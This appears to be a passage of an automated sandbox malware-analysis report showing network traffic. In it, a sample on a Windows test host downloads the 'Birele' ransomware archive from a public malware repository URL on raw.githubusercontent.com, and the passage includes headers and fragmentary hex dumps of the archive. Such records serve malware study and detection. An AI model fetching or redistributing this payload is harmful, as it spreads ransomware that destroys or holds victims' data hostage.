                                                                                                                                                    2022-09-29 13:02:10 UTC39809INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    176192.168.2.349945185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:02:10 UTC39810OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    177185.199.108.133443192.168.2.349945C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:02:10 UTC39811INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 116134
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:02:10 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6923-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456530.335173,VS0,VE1
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 433cb316eb313830ada86978220dc4af4ebc57e0
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:07:10 GMT
                                                                                                                                                    Source-Age: 70
                                                                                                                                                    2022-09-29 13:02:10 UTC39811INData Raw: 50 4b 03 04 14 00 01 00 08 00 0f b9 98 3f 08 02 e3 81 f6 c4 01 00 00 d2 01 00 15 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 69 72 65 6c 65 2e 65 78 65 78 87 52 7a 1b 81 59 80 6e db ec 5d ee 26 6d 7c 09 66 bf 9b 5b ca c3 1f 74 30 22 7f 86 ac 21 7f ce 7d ef 5b c1 ea 5b 7a d1 dd b0 eb 9b 49 ce 14 14 68 6b 08 48 f5 ec a4 42 03 54 02 12 f6 9d 93 01 c2 cb 0f e2 c9 32 64 50 3b 29 65 4b c7 74 fb 81 69 1a 6f ea cc bb e0 e3 53 1a 43 74 5f 3b 59 df ff a6 59 84 cb 71 1b d4 44 3c e2 d1 f6 be 7b b7 a0 62 95 ae e0 1f d7 0b 6b 49 83 79 23 5c 2d cd 1a 45 47 6d c5 92 5f c5 70 88 d9 7e 4d 94 8b d3 5c a7 b8 c3 66 c3 60 fb 0e 89 2c e7 e4 b3 65 32 70 be fd 5f 58 7b 5e ca c4 22 8d 5e 0f d8 7e 6d 13 c2 f0 ff c8 0a 43 f1 0e ab 32 bd 72 24 c3 10 03 39 3e 75 13 eb 26 26 11 a6 bf
                                                                                                                                                    Data Ascii: PK?Endermanch@Birele.exexRzYn]&m|f[t0"!}[[zIhkHBT2dP;)eKtioSCt_;YYqD<{bkIy#\-EGm_p~M\f`,e2p_X{^"^~mC2r$9>u&&
                                                                                                                                                    2022-09-29 13:02:10 UTC39813INData Raw: 8a f5 7c 29 39 16 89 76 c1 a8 b3 1b f0 ef c9 78 a0 8b f8 2f 0e f5 bc e8 c7 0e 5c 35 e1 40 e5 1a a3 c3 53 a1 36 11 3b 2f 25 b5 ef 8f d7 97 89 98 bb e4 eb 9a a6 35 a2 4a 6c eb c9 37 fa 9a ae 7b e5 5c a5 51 a5 d7 58 98 ee 57 4c 6d 06 c0 ec 8c b0 1f 06 85 dc c3 98 82 bc b9 be 0d 30 b8 4b a2 ae 0c 08 19 f3 d3 16 56 c4 87 92 5b 25 12 36 61 be ee 29 11 14 92 10 ba 7e cc 2d 28 bf 0f 8d c5 9f c4 46 dd cb 6a 4f 9d a0 fe ef 2b ca 6b e5 ee 2a 5a 1a 0a 15 85 78 d8 62 0c 3b ba 6f 42 d2 7b e6 1f 39 69 40 5c 35 1c d6 18 4f 2e 5f 56 f5 de be fe b6 81 4d f3 c4 84 09 5f e7 8b e0 28 ea 1c c8 69 a0 33 1b 65 e5 03 1e 6e af ec 02 6c f0 23 42 89 f9 85 a1 a2 88 55 cb a4 af 47 98 f7 32 57 d0 75 55 e8 58 37 6b aa 95 a8 b4 f2 d4 fa 98 58 07 4c 42 4a 70 9f d2 ea c8 57 37 9b 85 c0 d5
                                                                                                                                                    Data Ascii: |)9vx/\5@S6;/%5Jl7{\QXWLm0KV[%6a)~-(FjO+k*Zxb;oB{9i@\5O._VM_(i3enl#BUG2WuUX7kXLBJpW7
                                                                                                                                                    2022-09-29 13:02:10 UTC39814INData Raw: c2 6c 59 a4 7e 06 df a3 8c af f5 74 f5 8f 18 d2 5e ee ef 7a d5 71 23 9c ba cf 2e 45 f2 c0 1e 54 12 c6 72 02 6f 6d c5 16 cd ee d2 f3 e4 6f 24 c2 8c 09 8b 53 60 59 c9 2d d0 f8 2e 39 8b b6 8a 24 19 77 17 e7 e2 18 0a 74 2c 90 9d 07 13 f7 3c bf 95 4e 11 de b3 2b 18 f4 14 95 06 b1 6a ec 6f 27 19 3a f8 3d 36 4b 41 b5 2a e4 bb 59 a8 f3 23 fe 7c 16 ff 63 1e c7 3a a4 9c d4 e4 a1 9f 18 e8 3f 9e dd 9e 50 19 38 a5 06 d3 2a 0d 8f 93 ab b4 83 ad a4 1c fb 28 ca c5 8d 26 80 83 a7 b8 dd 6e 85 c7 00 3a 3d a0 0a 5f 54 03 e8 92 25 c6 67 40 eb a2 15 c8 56 d7 de 6b e8 9b 87 2a 95 a9 37 de fe 65 26 f8 85 20 82 76 72 0b 80 bb ad fe ce cb d4 c8 f8 e5 89 19 44 c1 5f 11 36 8d 6a 7e 95 aa a4 c5 ec 20 3c fc 85 77 1c 7e c2 60 3f 39 d8 55 2a 12 e9 cb 2f e4 35 0a 5b 53 69 cf 28 36 23 4c
                                                                                                                                                    Data Ascii: lY~t^zq#.ETromo$S`Y-.9$wt,<N+jo':=6KA*Y#|c:?P8*(&n:=_T%g@Vk*7e& vrD_6j~ <w~`?9U*/5[Si(6#L
                                                                                                                                                    2022-09-29 13:02:10 UTC39815INData Raw: c7 90 79 b8 d8 da 89 03 65 0c eb 36 fb f9 de a7 f2 ed 71 e0 30 ab 13 69 70 eb 3d f3 9f b1 f6 07 79 60 ff 38 4f c4 e8 6f 16 71 73 bf 5a 78 22 bd b8 d6 7e 3a e1 1a 9b 08 2e 91 3e 14 08 49 ad c8 78 d0 99 89 4b 1c 05 cb 75 b8 29 93 15 78 77 1b d6 d3 d1 5b 33 26 ee 03 b7 07 4c dc a9 fc 3f 3b 61 b9 94 27 fe 45 4c ab 5a fc b4 bd cc 75 e1 4b 07 37 2a 6f 42 90 14 88 c9 78 c7 02 ce 68 4f 35 0c fe 34 16 a7 c4 35 f2 d5 1b c6 21 49 90 8f 8b 81 12 d5 27 6f b1 d6 9e 24 e2 b1 2b ab c4 4f 91 d6 c3 c0 62 34 e5 ed 6a 5f 0c a0 07 48 a9 70 b2 fb 84 2a 99 06 3b 18 62 ed 46 3a b7 78 78 93 a9 95 3f a1 13 04 78 37 6e 51 42 fd 58 cb db 80 f7 31 ad 66 71 fd ed 0e 71 6f 00 4c 90 d5 e2 a5 7b 77 4f 74 29 27 3e 4b 04 a3 7d 94 8b ed 3d fb b8 db 4c 3b 9e 71 8c c3 a2 0d f3 e8 02 3e 72 6b
                                                                                                                                                    Data Ascii: ye6q0ip=y`8OoqsZx"~:.>IxKu)xw[3&L?;a'ELZuK7*oBxhO545!I'o$+Ob4j_Hp*;bF:xx?x7nQBX1fqqoL{wOt)'>K}=L;q>rk
                                                                                                                                                    2022-09-29 13:02:10 UTC39817INData Raw: dc 8e f3 15 82 7e 8b 36 8a 14 ca aa 8e 41 6c 35 9d 0d d3 9b 72 ce e0 af e2 32 1a d7 47 be a6 d2 87 8f fd bc 29 f9 25 8f 2b bf 7a ee 5f f5 d6 16 09 36 21 1d 1b 20 b9 48 44 06 96 07 64 89 2c 15 be 27 3d 6a f7 46 c9 18 87 f7 db 4f c4 72 15 b0 15 cf ae 94 fa 95 34 c9 d2 af f8 1d 30 b0 e5 d3 d8 2a ff 9c 8d 3f 39 cf f3 5f 61 1f 60 0d 94 59 52 c3 b7 18 c5 fb e5 f4 9c ec 79 d2 f7 3b d6 37 f6 3f 7e 97 88 a1 9b c6 f1 73 53 8c 59 89 1d 2b 0d 20 64 61 48 a8 13 85 8c fe 49 72 f6 c0 51 b4 6c 39 7c 99 bd e1 1a 0f e0 7b e2 38 ca 65 91 1c e2 b9 cf 36 36 94 47 96 20 7a 2f 86 a5 36 c3 58 f6 91 74 7f a6 67 ac 94 d3 8e cd 1c a1 d0 da 4d ce fd 8a c0 1f e7 50 64 89 35 a3 74 c8 5e 96 6f 66 fa 7e b5 ff 05 48 57 e8 b2 8e 94 aa 1b 0d 23 fd 07 ea e4 81 c3 1a 8e 1e 56 37 34 ce 99 87
                                                                                                                                                    Data Ascii: ~6Al5r2G)%+z_6! HDd,'=jFOr40*?9_a`YRy;7?~sSY+ daHIrQl9|{8e66G z/6XtgMPd5t^of~HW#V74
                                                                                                                                                    2022-09-29 13:02:10 UTC39818INData Raw: 2d ca 24 f5 9c ba 58 c3 29 90 e0 47 6d 3b 4b 82 41 4c cd 3b 56 f0 d8 db 67 39 12 4d f3 e6 91 38 88 ae ce 0b 13 d1 50 ee 3d 34 b5 02 56 8b 0b 95 40 66 08 1a f3 27 9e 8a 88 26 af 84 c6 48 3f 27 d8 3c ff d4 b6 3d a4 96 bc d2 88 65 b6 ec 50 8d 36 b5 1b c6 ec 8a f0 5f d9 c7 77 21 78 f0 fd 9d 5d 02 d7 3f 71 21 da 7b e0 2a a6 b1 2f ed f7 87 c1 67 b2 55 9f 50 f2 93 8c d9 13 02 7b 84 a5 33 39 64 40 10 e2 dc ed ca 41 32 de e9 57 8b 47 ee 68 5b 78 d5 ef 8d 3e a5 c4 ed a5 04 0a 43 bf 54 b0 27 e6 dc fb 16 e3 7d aa 40 a6 8e 8a 07 41 9d 04 4e 1c 90 2f 33 a7 03 91 f4 79 ac 33 60 16 2f 36 6e 6d 26 e1 e6 d0 70 da d0 86 bd 47 9b 27 41 5c ee 80 e3 fb 37 ea 46 41 4e 52 bb 0c db 8b 84 a9 6d 1b 5e 23 47 5f 35 36 1a 66 8b 69 ae 2c cb 4c 55 80 97 de ad 9b bc 26 88 7e 39 d3 08 8c
                                                                                                                                                    Data Ascii: -$X)Gm;KAL;Vg9M8P=4V@f'&H?'<=eP6_w!x]?q!{*/gUP{39d@A2WGh[x>CT'}@AN/3y3`/6nm&pG'A\7FANRm^#G_56fi,LU&~9
                                                                                                                                                    2022-09-29 13:02:10 UTC39819INData Raw: 85 af 37 94 7b c6 f5 45 db 21 f7 74 2f 62 98 10 2c d3 f0 06 42 b9 d3 2b c7 24 9d ff 0a a3 22 27 c4 9b 56 ee c9 5d 9f eb 18 6b cc 6d 3b 94 27 fc df 30 73 39 f8 9f 49 cb ba 13 34 65 b1 cb f7 50 97 73 02 e5 cc f8 16 29 f9 fd ba d3 f5 38 37 09 01 af fd d9 97 ae 3b 51 ec 53 25 57 bd 7e bc ba d7 c6 4e e4 2e e2 ab de e6 6f 6f 9c 43 f9 5a 6d 9c af 76 15 02 59 43 56 55 01 1e 24 cb 77 24 de a4 e0 48 e0 9c 0c c7 7e d7 6d fc 2d ec 24 4b 8e c3 03 d5 27 75 da d8 cd f8 4f 8b 1c df fe 8b 7d d7 20 f1 50 e6 a5 0b 7a c8 6e e6 c7 b5 98 29 24 89 d4 76 15 84 d3 bf a3 16 63 62 4b ed 80 0f 3f 1d 4a fb 21 b0 04 e0 fc 51 9e df b8 2a eb 13 bb ef bb c2 dc f1 7e 0a 09 1f 3e 8d 0a 5e 33 d8 1b f5 78 da 6a 8e 5a 4d 40 d5 0f 11 5d b9 27 16 4b 0b 75 8e 11 1f 7c 39 82 d0 65 f2 b0 9c b9 f9
                                                                                                                                                    Data Ascii: 7{E!t/b,B+$"'V]km;'0s9I4ePs)87;QS%W~N.ooCZmvYCVU$w$H~m-$K'uO} Pzn)$vcbK?J!Q*~>^3xjZM@]'Ku|9e
                                                                                                                                                    2022-09-29 13:02:10 UTC39821INData Raw: c6 2f 88 a8 1b d7 b6 59 34 af 0e 54 ff cb 92 25 2a e6 68 38 27 80 7b 48 b0 f5 b9 ce ac cb 1d 2a fd a0 8c 20 1b bc 1b f2 03 c7 99 06 8e 9e d9 b8 30 db b3 53 44 a0 e4 0b a2 c3 0d d6 85 47 fa e0 7c 66 45 ac 83 c2 8b f1 93 08 12 40 95 8f ab ce e4 2e 4e c8 3f 7b c1 64 02 75 0e a0 89 28 4b 5f a7 1f 1a 17 92 89 61 94 69 0f 14 5f 0b f0 33 e1 16 bd 9e 23 9a 33 67 d5 1e db 6f e2 77 ac 55 ca 94 90 61 05 5c 7d 4f 3b 4e b8 91 26 6f db 5c 09 1e ca 72 cf 52 0b be 6f 6c 8a 3a ea e7 b5 0b 07 46 49 e4 fb a1 b9 49 59 92 a8 6d 40 a1 a5 7b bf 8e fe 50 8b 2c 00 06 90 6d 23 f7 51 ba a4 a5 ee 5d 52 b5 fc 8a ab 56 2f e7 e3 fc 29 0e 2f e2 70 82 ce 4b e9 f3 f5 7b eb 3b 40 af a6 69 1f 0b 01 be 84 89 56 7b 6e 23 61 a8 3a 74 69 90 7b 27 d9 8e 66 d1 6b e5 cf 9c 49 de 22 0f a8 54 6f ef
                                                                                                                                                    Data Ascii: /Y4T%*h8'{H* 0SDG|fE@.N?{du(K_ai_3#3gowUa\}O;N&o\rRol:FIIYm@{P,m#Q]RV/)/pK{;@iV{n#a:ti{'fkI"To
                                                                                                                                                    2022-09-29 13:02:10 UTC39822INData Raw: 32 b1 6c 7c 05 84 57 c8 2c c7 2f 11 e6 09 07 62 fd b1 78 16 7e 07 2b 0d 19 cc eb 17 3e d0 eb 2e a6 19 7a 4a d4 63 34 33 9b 1f 1d c9 f0 7c f4 65 14 fd 1d af f3 5e 2b 84 20 49 bf 14 10 36 f9 94 ea de 28 e1 e6 c1 24 b1 52 0b 8b 10 f8 cb 56 c9 84 ae 54 14 4b 80 cc b3 40 9e c0 b1 98 42 dd af 1d 20 ab 14 96 8a c9 54 a0 90 5f 30 23 ec 68 b6 9b e5 d1 5b d5 cc 4b eb 3c db 98 19 e5 6f 2f 70 a9 c7 9b 0c ad cb 22 1a 07 0c 38 5a 29 e0 d8 0a 9d db 9a 33 81 04 9b ff 95 dd 26 ee b9 c3 d1 ee a3 06 f5 e4 5a 80 5e 50 19 a3 7d 56 17 60 6a f8 0e cb 4f 74 37 1e 0c 6c 4a b1 ea d2 4e a7 51 ec 8d 8e d5 f5 98 f5 3e 0f f5 2b fb b2 44 aa d2 ef 6a 7a 23 ba 62 50 5b 27 81 88 7c 91 11 71 36 01 33 61 d4 96 e6 fa d2 46 9b e0 f6 e4 ce 5b 21 39 b3 56 b7 be 8b a4 00 44 be b8 7a 94 67 2b e0
                                                                                                                                                    Data Ascii: 2l|W,/bx~+>.zJc43|e^+ I6($RVTK@B T_0#h[K<o/p"8Z)3&Z^P}V`jOt7lJNQ>+Djz#bP['|q63aF[!9VDzg+
                                                                                                                                                    2022-09-29 13:02:10 UTC39823INData Raw: 31 c5 14 a1 df 68 f3 a8 20 e3 c5 b4 58 ba 54 57 49 8e db c3 36 b2 f7 74 f1 f8 c3 78 89 12 a5 8f ab 92 61 6a 62 a6 33 7a 20 4a e4 d7 39 2c 1f a8 f3 a7 4d d5 0f 26 21 8a 0a 73 4f 8e 20 56 68 a0 9d d5 8c 79 39 b4 4c 47 81 90 cc 6f e0 5f e1 63 e3 5f 10 f7 ee 8a 3d 8d 14 e0 3f af 46 e7 9b bc d8 a7 25 98 a4 7c a6 bb 11 af 6a e3 80 cf 9b 2d b2 e4 90 fd 45 66 4c fe 80 b8 27 b2 07 07 7b 99 69 8f f2 c6 4f 0e 2d 03 51 15 d4 7e 1f 14 74 45 cd 53 a6 6d c7 f3 2a 2b c2 2d 01 81 05 08 b2 54 b0 87 e2 74 43 39 32 57 04 b3 81 c4 b7 7b 77 d6 d7 f5 c3 43 00 4f 49 a0 cb 4b 9c 2b c2 d9 56 02 38 31 b8 b9 f2 ea a1 9a c0 ce c3 cc 75 a4 c4 ab e7 92 76 7d 1c b2 23 c2 f3 75 96 8d c0 24 52 8a 5f a6 42 59 8a 94 89 ec 01 4e c9 ac 72 de 43 85 22 db b2 ee 4b e1 b5 a3 31 5a 6b 2a ab ff 85
                                                                                                                                                    Data Ascii: 1h XTWI6txajb3z J9,M&!sO Vhy9LGo_c_=?F%|j-EfL'{iO-Q~tESm*+-TtC92W{wCOIK+V81uv}#u$R_BYNrC"K1Zk*
                                                                                                                                                    2022-09-29 13:02:10 UTC39825INData Raw: bf c3 4c cc f3 48 a1 f1 37 d0 a5 1b bf 67 33 3f 75 bd 10 d0 df 9d df 59 4c 1a 53 35 51 a1 69 ca 07 cc 5c e4 89 8c 25 6e fd c5 a8 3f 23 f1 f8 05 24 25 9d f6 0c a0 33 dc df ef 13 9b 51 cd 61 95 b7 8f 15 32 af 9b f4 a4 de b4 4c 9d d3 11 7a 04 48 63 81 81 a4 d5 0e b3 e6 f9 8a b9 a0 83 55 0d 51 a0 0f c6 cb 99 41 57 9c 01 6e 08 0a 8f 72 56 60 89 1e 3b 80 ed a5 c7 1b 53 82 bb c6 59 5b 4e 3c e7 07 ba 30 46 90 4b c3 9f 52 05 6c 7a a6 06 3b 6f 9d d2 ab 5b 89 26 4e 52 02 80 e6 32 c9 2a ae c9 30 5b fb a2 5d d5 79 87 ec b3 40 0a b3 3a f0 27 62 4a 5c 57 1d 5f 1b 4f 20 82 50 0e 87 59 b6 a6 2d b1 da 89 dd f0 a9 a4 3e 00 d8 0a 3e ee 3a 9e 0f a3 6c 69 89 fe dd 3b 98 b9 d0 dc 45 b7 53 ac 78 9f e1 e6 6c a1 a7 e8 45 23 0c 9f a9 81 ba 7f 70 23 e1 ac f1 a0 08 bd 47 7f 5e 2f f9
                                                                                                                                                    Data Ascii: LH7g3?uYLS5Qi\%n?#$%3Qa2LzHcUQAWnrV`;SY[N<0FKRlz;o[&NR2*0[]y@:'bJ\W_O PY->>:li;ESxlE#p#G^/
                                                                                                                                                    2022-09-29 13:02:10 UTC39826INData Raw: 3a 7d 7f b8 ac 6a 77 3e 70 4b 17 88 5b f2 ca 0d b1 32 ae 01 76 af 8d e9 cf de 6f be 1b b6 cb bb ac 98 41 c9 b3 c2 1a ac 33 a2 dc 94 f4 38 d2 37 7f a3 c0 88 9a bb e1 3c 6e 86 33 f9 fa 4c 7c 24 ae 50 0b 11 1b 65 f0 61 28 8c e3 8d af 67 de f2 ec 0c 2d a3 2e a8 d5 41 f7 0a d3 13 66 da 0c 99 fa b5 4d 77 4d 59 f4 79 fd 58 87 dc 71 ad 2e 76 7a 58 cb 0f 1f c1 e8 4d 7d 1a d0 f6 a4 49 97 96 12 6f 43 8b e4 e3 d4 86 6d 86 cc d5 0f ea f2 b0 d3 c6 40 6e 75 72 e8 25 70 4b b7 5b c6 ed 59 32 27 b8 2b a1 f1 17 29 63 0f d1 5f bc 32 44 e4 d4 50 a6 8b 35 74 ff 15 ae a5 ae 75 48 bd 30 0b 24 70 e3 07 9c 7f d1 d2 68 ab dd c2 8e d5 78 7b 55 80 83 4f f6 cf f6 22 a8 7e a1 4a 86 2b b3 05 97 90 53 20 41 e1 cc 34 6f d9 18 7f f7 20 fb 5d 33 b3 dd 9b 15 77 77 ab 91 92 6c c9 45 69 86 5e
                                                                                                                                                    Data Ascii: :}jw>pK[2voA387<n3L|$Pea(g-.AfMwMYyXq.vzXM}IoCm@nur%pK[Y2'+)c_2DP5tuH0$phx{UO"~J+S A4o ]3wwlEi^
                                                                                                                                                    2022-09-29 13:02:10 UTC39827INData Raw: 81 9f a1 72 30 0d f3 fc d2 35 43 d9 5c 1d 9f 00 a8 c9 af 5f ba 08 6d 37 6f 12 47 40 02 85 7c 44 cf 6d 40 dc c2 56 32 20 ce 6a 8d 7b 1d 95 37 b4 9a 63 62 9e 38 fa f3 fc 16 7d b5 a5 7f d3 a1 02 f9 29 64 f4 9f de d7 37 31 9e 27 f4 0e 5d 94 bb d8 d6 1d 09 9b c0 58 d3 1a 67 99 47 ab c9 8d db 28 53 8e 4c c6 75 4a 51 bc 95 4a 87 eb 5a 44 65 b0 3a 1d 36 8e 5c 0d de 29 77 67 e2 34 0a d0 54 dc 5d 86 76 1c 08 89 a8 d1 7f fa bb 06 40 e7 d9 d0 40 92 8e ff fb 46 e9 9b 9f ce 93 a1 0e a2 62 d3 77 e5 91 a0 12 aa 37 42 94 7f 9a 5e 40 96 6b ef ea 52 4a c7 b2 f4 8a 5a d7 11 14 d1 36 db 7c a4 d3 9d d8 89 36 d7 61 73 09 07 84 0a 97 68 dd d8 eb 02 48 bb 5f ee bb 4c 5d c8 6f 50 22 39 b6 ab 6b f0 c8 73 53 8c 87 dc cc 4b 78 10 3b f7 69 c8 ef 82 d9 e1 31 6f e4 66 51 87 79 81 d6 d6
                                                                                                                                                    Data Ascii: r05C\_m7oG@|Dm@V2 j{7cb8})d71']XgG(SLuJQJZDe:6\)wg4T]v@@Fbw7B^@kRJZ6|6ashH_L]oP"9ksSKx;i1ofQy
                                                                                                                                                    2022-09-29 13:02:10 UTC39843INData Raw: 70 30 94 7c 1f ae 95 d5 92 33 05 5e 83 44 07 53 00 08 8e 48 e9 a0 43 02 63 f5 3c 1e c1 c7 9b 86 f8 8f 5d 3a 41 ea 32 ac 5b e0 e2 6a bb 73 00 aa 24 2c e1 70 64 a5 34 cc cc a9 8f 1b 98 42 22 12 dd 7f 86 b0 81 51 12 1b b1 e0 38 be 82 0b 50 50 bd ff 83 b1 5d 38 cb ab 97 f7 b8 9a 05 69 12 96 b2 98 8d f2 1f a9 04 cf a1 e7 8c 45 b6 0d ef 7f 87 0b 0a 2a 08 b5 59 28 9a 8c 2c fd 34 3b dd 4c 6d 37 d0 4f a5 8e 58 92 16 46 91 44 d6 b9 62 8f c1 3c c7 a3 d0 ee 54 24 7e 5a b0 a6 f8 c7 94 b3 2d 05 e8 3d c0 9d f3 6e 33 10 83 e2 e4 49 b8 e3 3b 38 a2 a3 66 ff 6b 37 9a 66 5e ad 4c 04 9c 5e eb b8 3c 50 6a 96 36 b2 1b 99 86 22 60 c8 af dc 06 df 1e 74 d8 e8 72 fa 48 bb ff d3 32 23 dd fe c8 02 3e fc 5b d2 c2 1f c2 32 6f a6 c8 fb 8c 8b 26 7d b1 89 4f 39 27 e6 76 bf 49 06 d1 ad 5e
                                                                                                                                                    Data Ascii: p0|3^DSHCc<]:A2[js$,pd4B"Q8PP]8iE*Y(,4;Lm7OXFDb<T$~Z-=n3I;8fk7f^L^<Pj6"`trH2#>[2o&}O9'vI^
                                                                                                                                                    2022-09-29 13:02:10 UTC39859INData Raw: 6b b2 4b d1 9b d4 f9 95 6d b2 6d e6 23 e8 ff 53 7b f4 05 2a 3f 53 a3 a1 66 89 c1 91 dd 62 a6 bb 72 f3 a5 95 99 34 6c 7b df 00 c6 2a f8 23 95 d7 4f e8 b1 cb e5 c3 d6 2a fd a5 50 a8 97 23 5b 0f 79 b4 be b4 1d e1 45 6c 47 7a 5e 6d 5f f8 4a 2d 87 dc 55 c3 3f 5b 0e db b4 a0 f0 10 2b a3 6b 92 6b 87 c1 6b 69 18 aa 01 57 30 a7 22 32 76 21 22 62 db ed 73 ff 80 48 2d 27 ce f0 6e e4 fe 7a 24 12 d8 16 d7 fa 42 05 1b 4c d0 88 1e 7e 64 b1 0b 90 07 fb 36 c0 73 30 5c c5 77 41 f5 fc 63 d0 8a b3 f9 85 ff 58 4f 0c 4f d4 c2 59 a0 b7 98 6b 4e a0 79 0c 07 61 ee 51 ed 43 35 13 04 93 60 c6 7c 35 da fe b1 0f cd fa c9 3e a3 95 ce 1e ac f8 4b 9b 3b b0 aa d2 15 dc 45 8b 30 2a 32 b4 74 6c 02 14 ec f6 67 1c a5 3d 71 46 e5 78 5a 26 fa e9 29 b4 9e 44 d4 b8 8c 31 7d f3 9b af a9 31 44 4b
                                                                                                                                                    Data Ascii: kKmm#S{*?Sfbr4l{*#O*P#[yElGz^m_J-U?[+kkkiW0"2v!"bsH-'nz$BL~d6s0\wAcXOOYkNyaQC5`|5>K;E0*2tlg=qFxZ&)D1}1DK
                                                                                                                                                    2022-09-29 13:02:10 UTC39875INData Raw: 9a 8f 83 8f 02 7a cb 37 bb fd ca e7 a7 e0 3f 90 12 79 fa be c2 e9 9e 5f 68 cb 77 27 0f 26 34 5f f3 93 84 61 50 7a 3f ac 9b f4 5b 64 ff 5b ff 80 30 d6 60 af a3 8d e3 f4 cd d7 cc 1a 31 ca 5d 22 56 ac 1a a4 13 9c 47 97 6c 4b 01 55 df 3e aa 28 08 a9 aa 33 01 da 53 80 ce 06 4f 87 77 db 82 4c 6f 01 28 8e f6 7a 6e 66 44 56 cb b8 66 4f 24 25 90 f1 3c 10 5e 7c f5 09 94 4f b5 fa dc 84 d2 1d f1 a6 6c d4 3b 14 52 55 e9 b4 67 61 b8 43 72 bb 7e 46 63 a5 d0 b4 1c 38 71 d2 74 e5 81 f8 f0 ae 78 eb 70 1c a4 01 da 90 f8 43 d8 2f 82 ac 11 ce 1e 3d f3 5a 91 d6 8e 2f d7 19 9c b1 21 02 df f9 bc 5d 55 6d 89 4e 4c 42 48 68 bd f8 45 40 c5 d5 88 6c 42 bf 67 a4 c7 c2 dd 0c 1f a8 2d bc 92 e9 29 51 d1 4d 55 81 df 41 07 0f bb 54 1f 79 2e 19 f7 8c 61 32 c1 6b a2 5a 36 1b 80 ac af f4 c2
                                                                                                                                                    Data Ascii: z7?y_hw'&4_aPz?[d[0`1]"VGlKU>(3SOwLo(znfDVfO$%<^|Ol;RUgaCr~Fc8qtxpC/=Z/!]UmNLBHhE@lBg-)QMUATy.a2kZ6
                                                                                                                                                    2022-09-29 13:02:10 UTC39891INData Raw: 8b a4 c6 2c b0 5b 51 9f 28 9a f8 06 45 2f d9 53 4a 0a c1 b4 c5 63 2f 1d ba 07 6a 18 13 45 9c 18 a2 05 d3 87 18 b1 10 23 2e 1d 3c c2 06 dc bd 37 04 56 d0 b1 41 08 ed 33 fd 40 e7 7b 08 66 31 17 88 e1 81 ab eb d5 ea 29 55 31 01 ee f6 3b 22 54 0e 4e 1c e6 31 62 b2 3f f9 88 92 3e c1 f0 21 93 b6 2e 9a bf f8 88 a5 b0 b4 b4 40 a4 1c c9 e4 4c 0c 76 23 0b d0 ea 79 8b c3 26 0a 60 49 28 c4 4e 32 5e bd 4e 17 bb cb b8 22 27 03 dd c2 c1 dc a8 ec 04 c8 e5 e5 fd c1 a6 49 85 ca 24 d5 5f 9c 98 45 a8 72 bb cb 36 ce 71 49 bc 1c a1 d2 59 30 f7 f2 42 18 1b b8 d1 73 6f 84 8f eb ae 03 da 14 11 53 12 e2 f6 96 bb 07 f8 95 86 5b c9 f1 ba cd 92 3f a9 ef c7 95 fa 3a fa dc 76 1e c6 bd a1 c2 55 1d 08 21 55 e5 02 df f2 10 f0 9b b0 85 d3 66 75 cd dc b2 d6 03 d7 4e e3 65 b2 fd 64 18 15 96
                                                                                                                                                    Data Ascii: ,[Q(E/SJc/jE#.<7VA3@{f1)U1;"TN1b?>!.@Lv#y&`I(N2^N"'I$_Er6qIY0BsoS[?:vU!UfuNed
